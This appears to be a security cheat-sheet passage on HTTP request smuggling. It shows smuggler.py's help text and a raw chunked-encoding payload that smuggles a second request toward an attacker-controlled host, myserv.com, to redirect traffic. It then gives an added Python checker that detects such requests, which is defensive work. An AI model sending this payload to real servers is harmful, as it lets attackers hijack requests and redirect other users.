https://portswigger.net/web-security/request-smuggling
# Smuggler.py is a small tool used to test that
python smuggler.py -h
by @gwendallecoguic
usage: smuggler.py [-h] [-a PATH] [-d HEADER] [-i TIMEOUT] [-m METHOD] [-o HOSTS] [-s SCHEME] [-t THREADS] [-u URLS] [-v VERBOSE]

optional arguments:
  -h, --help            show this help message and exit
  -a PATH, --path PATH  set paths list
  -d HEADER, --header HEADER
                        custom headers
  -i TIMEOUT, --timeout TIMEOUT
                        set timeout, default 10
  -m METHOD, --method METHOD
                        set methods separated by comma, default: all
  -o HOSTS, --hosts HOSTS
                        set host list (required or -u)
  -s SCHEME, --scheme SCHEME
                        scheme to use, default: http,https
  -t THREADS, --threads THREADS
                        threads, default 10
  -u URLS, --urls URLS  set url list (required or -o)
  -v VERBOSE, --verbose VERBOSE
                        display output, 0=nothing, 1=only vulnerable, 2=all
                        requests, 3=requests+headers, 4=full debug, default: 1
Redirecting to Owned host
https://medium.com/@ricardoiramar/the-powerful-http-request-smuggling-af208fafa142
# Request using Transfer-Encoding: chunked
# Then, another request, toward controlled domain
# You can use Burp Collaborator to prove it
POST /xxxx HTTP/1.1
Transfer-Encoding: chunked
Host: www.target.com
...

data
0

GET /somefile HTTP/1.1
Host: myserv.com
X-Ignore: X
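
Seen from the defending side, the request above has two recognisable traits: conflicting framing headers, and a second request line sitting after the terminating `0` chunk. The following check is an added example, not code from smuggler.py or the linked articles; it assumes `raw` is the byte span a front end forwarded as one request, and the function names and `.example` hostnames are constructed for illustration.

```python
import re

REQUEST_LINE = re.compile(rb"[A-Z]+ \S+ HTTP/1\.[01]\r\n")

def split_message(raw):
    """Return (lower-cased header pairs, body) for one raw HTTP/1.x message."""
    head, _, body = raw.partition(b"\r\n\r\n")
    pairs = [line.partition(b":") for line in head.split(b"\r\n")[1:]]
    return [(k.strip().lower(), v.strip()) for k, _, v in pairs], body

def after_last_chunk(body):
    """Walk a chunked body; return whatever follows the terminating 0-size chunk."""
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)                # ValueError if truncated
        size = int(body[pos:eol].split(b";")[0], 16)  # ValueError if not hex
        if size < 0:
            raise ValueError("negative chunk size")
        if size == 0:
            end = body.find(b"\r\n\r\n", eol)         # blank line closes the trailer section
            return body[end + 4:] if end != -1 else b""
        pos = eol + 2 + size + 2                      # skip chunk data and its CRLF

def audit_request(raw):
    """raw: bytes a front end forwarded as ONE request (assumption of this example)."""
    findings = []
    headers, body = split_message(raw)
    te = [v.lower() for k, v in headers if k == b"transfer-encoding"]
    if te and any(k == b"content-length" for k, _ in headers):
        findings.append("both Content-Length and Transfer-Encoding present")
    if any(b"chunked" in v for v in te):
        try:
            rest = after_last_chunk(body)
        except ValueError:
            findings.append("malformed chunked body")
            rest = b""
        if REQUEST_LINE.match(rest):
            findings.append("second request after terminating chunk")
            if dict(split_message(rest)[0]).get(b"host") != dict(headers).get(b"host"):
                findings.append("trailing request targets a different Host")
    return findings

# Constructed samples; hostnames are placeholders, not values from the page.
CLEAN = (b"POST /upload HTTP/1.1\r\nHost: www.target.example\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n4\r\ndata\r\n0\r\n\r\n")
SUSPECT = (b"POST /xxxx HTTP/1.1\r\nHost: www.target.example\r\nContent-Length: 70\r\n"
           b"Transfer-Encoding: chunked\r\n\r\n4\r\ndata\r\n0\r\n\r\n"
           b"GET /somefile HTTP/1.1\r\nHost: other.example\r\nX-Ignore: X")
```

`audit_request(SUSPECT)` returns three findings and `audit_request(CLEAN)` returns none; rejecting requests that carry both framing headers at the front end removes the ambiguity this check looks for.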